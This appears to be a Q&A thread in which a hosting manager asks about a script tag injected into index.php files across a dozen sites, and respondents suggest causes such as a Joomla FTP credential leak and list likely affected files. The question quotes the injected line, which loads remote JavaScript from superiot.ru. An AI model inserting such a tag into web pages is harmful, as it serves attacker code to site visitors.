# Information about recent code injection from http://superiot.ru

Tags: php, security

I manage the hosting for a few dozen websites. Since about a week I've been finding this code in 12 different websites in the`index.php` files:

```
<script type="text/javascript" src="http://superiot.ru/**.js"></script> // The name of    the actual javascript file differs
<!-- some hash here-->
```

Some of the websites are on different servers, some aren't. I'm just wondering if anyone else has been seeing this too.

Edit with some more information:

- All servers are centOS 5.3
- PHP versions are either 5.2.9 or 5.2.4
- Apache versions are either 2.2.3 or 1.3.39

Answer (score 0):

Are you using the same software on each of the websites in question?

Looks like either a tainted CMS plugin or your sites have attracted some undesirable attention.

Comment: 2 of the websites use the Joomla CMS, the others are custom built. They don't seem to share a third party tool besides google analytics.

Comment: While there is still a strong likelihood that the attack was automated, you should probably respond to this incident as though a malicious user has access to your systems (because he probably does, if he bothers using it).

Answer (score 0):

That javascript is added through an FTP exploit.  If I recall, it finds the FTP account data through a hole in Joomla that exposes the FTP Layer user/password which Joomla so elegantly stores in the clear.

You'll find any index.*, default.*, home.* may be affected.  Also, pay particular attention to jquery.js that is locally maintained, it can modify that to add code to the bottom.